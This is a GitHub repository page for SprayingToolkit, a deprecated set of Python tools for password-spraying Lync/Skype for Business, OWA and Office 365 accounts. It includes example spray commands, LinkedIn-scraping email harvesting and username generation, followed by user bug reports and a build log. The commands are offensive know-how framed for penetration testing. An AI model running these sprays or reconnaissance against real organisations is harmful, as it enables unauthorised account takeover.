byt3bl33d3r / sprayingtoolkit Goto Github PK

View Code? Open in Web Editor NEW

1.4K 35.0 264.0 118 KB

Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient

License: GNU General Public License v3.0

Python 100.00%

python3 red-teams security owa lync skype-for-business o365 pentesting security-tools password-spraying-attacks

sprayingtoolkit's Introduction

Deprecation Notice

This project is no longer maintained. The following alternative projects are better and actively maintained:

SprayingToolkit

Description

A set of Python scripts/utilities that tries to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient.

Official Discord Channel

Come hang out on Discord!

Installation

Install the pre-requisites with pip3 as follows:

sudo -H pip3 install -r requirements.txt

Or use a Python virtual environment if you don't want to install the packages globally.

Tool Overview

Atomizer

A blazing fast password sprayer for Lync/Skype For Business and OWA, built on Asyncio and Python 3.7

Usage

Usage:
    atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --recon [--debug]
    atomizer -h | --help
    atomizer -v | --version

Arguments:
    target         target domain or url
    password       password to spray
    userfile       file containing usernames (one per line)
    passwordfile   file containing passwords (one per line)

Options:
    -h, --help               show this screen
    -v, --version            show version
    -c, --csvfile CSVFILE    csv file containing usernames and passwords
    -i, --interval TIME      spray at the specified interval [format: "H:M:S"]
    -t, --threads THREADS    number of concurrent threads to use [default: 3]
    -d, --debug              enable debug output
    -p, --targetPort PORT    target port of the IMAP server (IMAP only) [default: 993]
    --recon                  only collect info, don't password spray
    --gchat URL              gchat webhook url for notification
    --slack URL              slack webhook url for notification
    --user-row-name NAME     username row title in CSV file [default: Email Address]
    --pass-row-name NAME     password row title in CSV file [default: Password]
    --user-as-pass USERFILE  use the usernames in the specified file as the password (one per line)

Examples

./atomizer.py owa contoso.com 'Fall2018' emails.txt

./atomizer.py lync contoso.com 'Fall2018' emails.txt

./atomizer lync contoso.com --csvfile accounts.csv

./atomizer lync contoso.com --user-as-pass usernames.txt

./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon

./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>

Vaporizer

A port of @OrOneEqualsOne's GatherContacts Burp extension to mitmproxy with some improvements.

Scrapes Google and Bing for LinkedIn profiles, automatically generates emails from the profile names using the specified pattern and performes password sprays in real-time.

(Built on top of Atomizer)

Examples

mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'

By default email_format is set to {first}.{last} pattern and is not a required argument.

The domain parameter is the domain to use for generating emails from names, the target parameter is the domain or url to password spray

Install the mitmproxy cert, set the proxy in your browser, go to google and/or bing and search (make sure to include the /in):

site:linkedin.com/in "Target Company Name"

Emails will be dumped to emails.txt in the specified format, and passed to Atomizer for spraying.

Aerosol

Scrapes all text from the target website and sends it to AWS Comprehend for analysis to generate custom wordlists for password spraying.

Still a work in progress

Usage

mitmdump -s aerosol.py --set domain=domain.com

Spindrift

Converts names to active directory usernames (e.g Alice Eve => CONTOSO\aeve)

Usage

Usage:
    spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]

Arguments:
    file    file containing names, can also read from stdin

Options:
    --target TARGET   optional domain or url to retrieve the internal domain name from OWA
    --domain DOMAIN   manually specify the domain to append to each username
    --format FORMAT   username format [default: {f}{last}]

Examples

Reads names from STDIN, --domain is used to specify the domain manually:

cat names.txt | ./spindrift.py --domain CONTOSO

Reads names from names.txt, --target dynamically grabs the internal domain name from OWA (you can give it a domain or url)

./spindrift.py names.txt --target contoso.com

sprayingtoolkit's People

Contributors

Stargazers

Watchers

Forkers

vysecurity boh hfakar acknowledgehim f13end dannymas m00zh33 cybermonitor shantanu561993 alexisahmed ashr applerich slowmistio ro9ueadmin w00t3k ana3zoz devhttps jbarcia modulexcite pachinko trietptm-on-coding-algorithms aurorafang veteransec gatarelib jack51706 permikomnaskaltara fatnerd raystyle idkwim nunombarros zorg1331 minkione kamleshahre mrmugiwara slooppe hapazores nas1024 azurecloudmonk cephurs ndur0 balancedstate mohamedmajid91 attackgithub wisdark alpha0king lolici123 p3t3rp4rk3r jayaramyalla c002 an4kein orf53975 vxton theotherside analyticsearch l9sk clicknull vitty84 open-sec jrodriguez556 mgcfish ntgitdude23 gosecure evil5hadow marciopocebon imulmul synacksecurity pbutler6163 jeffmcjunkin mr-b0b tquentin blackhatethicalhacking w1ck3dth1ngs ripleyludicrous1979 n00py singe quikilr jr69ss vortexau ameg-yag landaboot und3rcl0ck3d skizap anaswae superuser5 hackumono netwrkspider chazmacc red-infosec gkroon devkw swarupsro datafox 5l1v3r1 pwnfoo basilthomasev joeinfosec reesdanny rakhithjk coffeegist gr0pequ0ter

sprayingtoolkit's Issues

Dumped 0 valid accounts to lync_valid_accounts.txt, when it actually found a valid cred

I notice that even if it found a valid credential at the end it says Dump 0 Valid Accounts
Leading me to believe it didn't work , but i saw a green + at one point , scroll up and see i had a few valid creds.

not sure it if change anything but it was a list of 5000 usernames

Dumped 0 valid accounts to lync_valid_accounts.txt
python3.7 atomizer.py

atomizer - random behavior

Kali Linux 2020.4 fully patched.
Python 3.9.1+

./atomizer.py owa https://webmail.acme.org/ews/exchange.asmx /root/passwords.txt /root/users.txt --interval 00:00:01

Random behavior:

Reports every password in my list as valid (only one should be valid).
Test on a different server and it reports every password in my list as invalid (one should be valid).
The output to the file is not in the same order of the passwords that are sprayed.

Inventory notification

SprayingToolkit has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/tools.html#SprayingToolkit

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool and improve its referencing.

Badges

The badge shows to your community that your are inventoried. It looks good but also shows you care about your project, that your tool is referenced.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.

Want to thank us?

If you want to thank us, you can help make our open project better known by tweeting about it! For example:

So what?

That's all, this message is just to notify you if you care. Else you can close this issue.

OWA accounts with 2FA enabled report Invalid creds even when password is correct

I'm testing the tool against my organization email address, hosted on Office365.
I know the password is correct but SprayingToolkit reports:

[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL:...............
... OWA domain appears to be hosted on Office365
[-] Error parsing internal domain name using OWA. This usually means OWA is being hosted on-prem or the target has a hybrid AD deployment
Do some recon and pass the custom OWA URL as the target if you really want the internal domain name, password spraying can still continue though :)
Full error: Input seems to be a non-valid base64-encoded string: 'Basic Realm=""'

....(Invalid credentials)

If I disable 2FA, credentials are reported as correct.

Atomizer Fails - Sleep length must be non-negative

I've been experiencing a problem where atomizer.py crashes occasionally while sleeping until the next spray.

Traceback (most recent call last):pray
  File "atomizer.py", line 186, in <module>
    countdown_timer(*args['--interval'].split(':'))
  File "/opt/SprayingToolkit/core/utils/time.py", line 31, in countdown_timer
    time.sleep((target - now()).total_seconds())
ValueError: sleep length must be non-negative

The crashes happen at random intervals and don't seem to correlate to any specific time in the countdown. Sometimes it will count down successfully all the way and perform another spray, sometimes it will do so successfully many times, but sometimes it crashes.

This is on the latest version of SprayingToolkit, installed with pipenv. Ran after loading the virtual environment.

atomizer.py

Kali Linux 2020.4 fulling patched
Python 3.9.1+

The output to the screen and file are not correct for SprayingToolkit/atomizer.py

./atomizer.py owa https://webmail.acme.org/ews/exchange.asmx /root/passwords.txt /root/users.txt
[] Using ...
[+] Got internal domain ...
[] Starting spray ...
[+] Found credentials: [email protected]:/root/passwords.txt
[+] Dumped 1 valid accounts to owa_valid_accounts.txt

cat owa_valid_accounts.txt
[email protected]:/root/passwords.txt

I would expect the output to be [email protected]:winter2021

Feature Request: ADFS Portal Support

Any chance of supporting spraying against ADFS portals, and perhaps detection of users who have 2FA enabled/disabled/in enrollment?

Failed to read from csv

atomizer fails to read from --csvfile.

CSV File

email,password
[email protected],Password1
[email protected],Password2
[email protected],Password3

atomizer error

pentest/osint/SprayingToolkit/atomizer.py owa test.com --csvfile test-creds.csv --user-row-name email --pass-row-name password
[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL: None
[*] OWA domain appears to be hosted on Office365
[*] Using Office 365 autodiscover URL: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
[-] Error parsing internal domain name using OWA. This usually means OWA is being hosted on-prem or the target has a hybrid AD deployment
    Do some recon and pass the custom OWA URL as the target if you really want the internal domain name, password spraying can still continue though :)

    Full error: Invalid URL 'None': No schema supplied. Perhaps you meant http://None?

[*] Starting spray at 2019-11-14 10:57:43 UTC
Traceback (most recent call last):
  File "/pentest/osint/SprayingToolkit/atomizer.py", line 222, in <module>
    pass_row_name=args['--pass-row-name']
  File "/usr/lib/python3.7/asyncio/base_events.py", line 584, in run_until_complete
    return future.result()
  File "/pentest/osint/SprayingToolkit/atomizer.py", line 113, in atomize_csv
    for row in csvreader
  File "/pentest/osint/SprayingToolkit/atomizer.py", line 113, in <listcomp>
    for row in csvreader
KeyError: 'email'

Granted, these emails are all fake; but it should at least try to request them? I have also tried setting the column names to Email Address and Password. To no avail.

I am also running version 1.0.0dev.

SSL: CERTIFICATE_VERIFY_FAILED

getting this error when targeting imap which I believe is using a self signed certificate.

Processing hangs/dies on larger input files

I have tried running atomizer.py several times and for input userfiles > 597, it starts behaving oddly.

For userfiles < 597, it appears to run and terminate as expected.
For userfiles > 597, it will process to around 597, then hang indefinitely.
For very large userfiles (>100000) it will process a few hundred then die. I am not sure what is causing the process to die, there is no error message. I have even enabled the "-d" flag to see if there was any debug messages of use. Nothing. I simply get the message "Killed".

This is the commandline I have used (obviously I actually entered my correct and ).
python3.7 atomizer.py lync <domain> <password> --userfile users.txt

I have tried running this on both Kali Rolling 2018.3 and on Ubuntu 16.04.3 LTS. Same results on both.

An error occurred while installing brotlipy==0.7.0! Will try again.

Anybody has the same troubles installing the toolkit?
When i cd to the SprayingToolkit directory and do a pipenv install I get:

pipenv install                                             ✔    130  13:15:19 
Installing dependencies from Pipfile.lock (7c127f)…
An error occurred while installing brotlipy==0.7.0! Will try again.
  🐍   ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ 41/41 — 00:00:46
Installing initially–failed dependencies…
Collecting brotlipy==0.7.0 ▉▉▉▉▉▉▉▉▉▉ 0/1 — 00:00:00
  Using cached https://files.pythonhosted.org/packages/d9/91/bc79b88590e4f662bd40a55a2b6beb0f15da4726732efec5aa5a3763d856/brotlipy-0.7.0.tar.gz
Building wheels for collected packages: brotlipy
  Running setup.py bdist_wheel for brotlipy: started
  Running setup.py bdist_wheel for brotlipy: finished with status 'error'
  Complete output from command /root/.local/share/virtualenvs/SprayingToolkit-OCb3TDaP/bin/python3.7m -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-3neh2n4c/brotlipy/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" bdist_wheel -d /tmp/pip-wheel-satii7nn --python-tag cp37:
  running bdist_wheel
  running build
  running build_py
  creating build
  creating build/lib.linux-x86_64-3.7
  creating build/lib.linux-x86_64-3.7/brotli
  copying src/brotli/build.py -> build/lib.linux-x86_64-3.7/brotli
  copying src/brotli/__init__.py -> build/lib.linux-x86_64-3.7/brotli
  copying src/brotli/brotli.py -> build/lib.linux-x86_64-3.7/brotli
  warning: build_py: byte-compiling is disabled, skipping.
  
  running build_clib
  building 'libbrotli' library
  creating build/temp.linux-x86_64-3.7
  creating build/temp.linux-x86_64-3.7/libbrotli
  creating build/temp.linux-x86_64-3.7/libbrotli/common
  creating build/temp.linux-x86_64-3.7/libbrotli/dec
  creating build/temp.linux-x86_64-3.7/libbrotli/enc
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/common/dictionary.c -o build/temp.linux-x86_64-3.7/libbrotli/common/dictionary.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/huffman.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/huffman.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/bit_reader.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/bit_reader.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/decode.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/decode.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/state.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/state.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/backward_references.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/backward_references.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/backward_references_hq.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/backward_references_hq.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/bit_cost.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/bit_cost.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/block_splitter.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/block_splitter.o
  In file included from libbrotli/enc/./block_splitter.h:14,
                   from libbrotli/enc/block_splitter.c:9:
  libbrotli/enc/./block_splitter_inc.h: In function ‘SplitByteVectorLiteral’:
  libbrotli/enc/./block_splitter_inc.h:403:61: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       double* insert_cost = BROTLI_ALLOC(m, double, data_size * num_histograms);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h:405:62: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       uint8_t* switch_signal = BROTLI_ALLOC(m, uint8_t, length * bitmaplen);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h: In function ‘SplitByteVectorCommand’:
  libbrotli/enc/./block_splitter_inc.h:403:61: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       double* insert_cost = BROTLI_ALLOC(m, double, data_size * num_histograms);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h:405:62: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       uint8_t* switch_signal = BROTLI_ALLOC(m, uint8_t, length * bitmaplen);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h: In function ‘SplitByteVectorDistance’:
  libbrotli/enc/./block_splitter_inc.h:403:61: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       double* insert_cost = BROTLI_ALLOC(m, double, data_size * num_histograms);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  libbrotli/enc/./block_splitter_inc.h:405:62: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
       uint8_t* switch_signal = BROTLI_ALLOC(m, uint8_t, length * bitmaplen);
  libbrotli/enc/././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/histogram.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/histogram.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/memory.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/memory.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/literal_cost.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/literal_cost.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/brotli_bit_stream.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/brotli_bit_stream.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/compress_fragment_two_pass.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/compress_fragment_two_pass.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/compress_fragment.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/compress_fragment.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/cluster.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/cluster.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/utf8_util.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/utf8_util.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/encode.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/encode.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/metablock.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/metablock.o
  In file included from libbrotli/enc/././block_splitter.h:14,
                   from libbrotli/enc/./metablock.h:14,
                   from libbrotli/enc/metablock.c:10:
  libbrotli/enc/metablock.c: In function ‘ContextBlockSplitterFinishBlock’:
  libbrotli/enc/metablock.c:279:45: warning: ‘*’ in boolean context, suggest ‘&&’ instead [-Wint-in-bool-context]
           BROTLI_ALLOC(m, HistogramLiteral, 2 * num_contexts);
  libbrotli/enc/./././memory.h:43:5: note: in definition of macro ‘BROTLI_ALLOC’
     ((N) ? ((T*)BrotliAllocate((M), (N) * sizeof(T))) : NULL)
       ^
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/static_dict.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/static_dict.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/dictionary_hash.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/dictionary_hash.o
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/enc/entropy_encode.c -o build/temp.linux-x86_64-3.7/libbrotli/enc/entropy_encode.o
  x86_64-linux-gnu-gcc-ar rcs build/temp.linux-x86_64-3.7/liblibbrotli.a build/temp.linux-x86_64-3.7/libbrotli/common/dictionary.o build/temp.linux-x86_64-3.7/libbrotli/dec/huffman.o build/temp.linux-x86_64-3.7/libbrotli/dec/bit_reader.o build/temp.linux-x86_64-3.7/libbrotli/dec/decode.o build/temp.linux-x86_64-3.7/libbrotli/dec/state.o build/temp.linux-x86_64-3.7/libbrotli/enc/backward_references.o build/temp.linux-x86_64-3.7/libbrotli/enc/backward_references_hq.o build/temp.linux-x86_64-3.7/libbrotli/enc/bit_cost.o build/temp.linux-x86_64-3.7/libbrotli/enc/block_splitter.o build/temp.linux-x86_64-3.7/libbrotli/enc/histogram.o build/temp.linux-x86_64-3.7/libbrotli/enc/memory.o build/temp.linux-x86_64-3.7/libbrotli/enc/literal_cost.o build/temp.linux-x86_64-3.7/libbrotli/enc/brotli_bit_stream.o build/temp.linux-x86_64-3.7/libbrotli/enc/compress_fragment_two_pass.o build/temp.linux-x86_64-3.7/libbrotli/enc/compress_fragment.o build/temp.linux-x86_64-3.7/libbrotli/enc/cluster.o build/temp.linux-x86_64-3.7/libbrotli/enc/utf8_util.o build/temp.linux-x86_64-3.7/libbrotli/enc/encode.o build/temp.linux-x86_64-3.7/libbrotli/enc/metablock.o build/temp.linux-x86_64-3.7/libbrotli/enc/static_dict.o build/temp.linux-x86_64-3.7/libbrotli/enc/dictionary_hash.o build/temp.linux-x86_64-3.7/libbrotli/enc/entropy_encode.o
  running build_ext
  generating cffi module 'build/temp.linux-x86_64-3.7/_brotli.c'
  building '_brotli' extension
  creating build/temp.linux-x86_64-3.7/build
  creating build/temp.linux-x86_64-3.7/build/temp.linux-x86_64-3.7
  x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli -Ilibbrotli/include -I/usr/include/python3.7m -I/root/.local/share/virtualenvs/SprayingToolkit-OCb3TDaP/include/python3.7m -c build/temp.linux-x86_64-3.7/_brotli.c -o build/temp.linux-x86_64-3.7/build/temp.linux-x86_64-3.7/_brotli.o
  build/temp.linux-x86_64-3.7/_brotli.c:22:12: fatal error: pyconfig.h: No such file or directory
   #  include <pyconfig.h>
              ^~~~~~~~~~~~
  compilation terminated.
  error: command 'x86_64-linux-gnu-gcc' failed with exit status 1
  
  ----------------------------------------
  Running setup.py clean for brotlipy
Failed to build brotlipy
Installing collected packages: brotlipy
  Running setup.py install for brotlipy: started
    Running setup.py install for brotlipy: finished with status 'error'
    Complete output from command /root/.local/share/virtualenvs/SprayingToolkit-OCb3TDaP/bin/python3.7m -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-3neh2n4c/brotlipy/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-apnag4z3/install-record.txt --single-version-externally-managed --compile --install-headers /root/.local/share/virtualenvs/SprayingToolkit-OCb3TDaP/include/site/python3.7/brotlipy:
    running install
    running build
    running build_py
    creating build
    creating build/lib.linux-x86_64-3.7
    creating build/lib.linux-x86_64-3.7/brotli
    copying src/brotli/build.py -> build/lib.linux-x86_64-3.7/brotli
    copying src/brotli/__init__.py -> build/lib.linux-x86_64-3.7/brotli
    copying src/brotli/brotli.py -> build/lib.linux-x86_64-3.7/brotli
    warning: build_py: byte-compiling is disabled, skipping.
    
    running build_clib
    building 'libbrotli' library
    creating build/temp.linux-x86_64-3.7
    creating build/temp.linux-x86_64-3.7/libbrotli
    creating build/temp.linux-x86_64-3.7/libbrotli/common
    creating build/temp.linux-x86_64-3.7/libbrotli/dec
    creating build/temp.linux-x86_64-3.7/libbrotli/enc
    x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/common/dictionary.c -o build/temp.linux-x86_64-3.7/libbrotli/common/dictionary.o
    x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/huffman.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/huffman.o
    x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/bit_reader.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/bit_reader.o
    x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/decode.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/decode.o
    x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Ilibbrotli/include -Ilibbrotli/ -Isrc/brotli -c libbrotli/dec/state.c -o build/temp.linux-x86_64-3.7/libbrotli/dec/state.o
    x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat

Unsure if this is really an issue--I may just be doing it wrong

I tried to use the atomizer against a Windows 2016 server running a vanilla install of Exchange 2016.
The target I used was https://mail.my-domain.tld (where my-domain and tld were given the appropriate values for my setting).
Any username:password combination would yield "Found" because the get requests they generate give a 200 response, but none of them actually logged in.

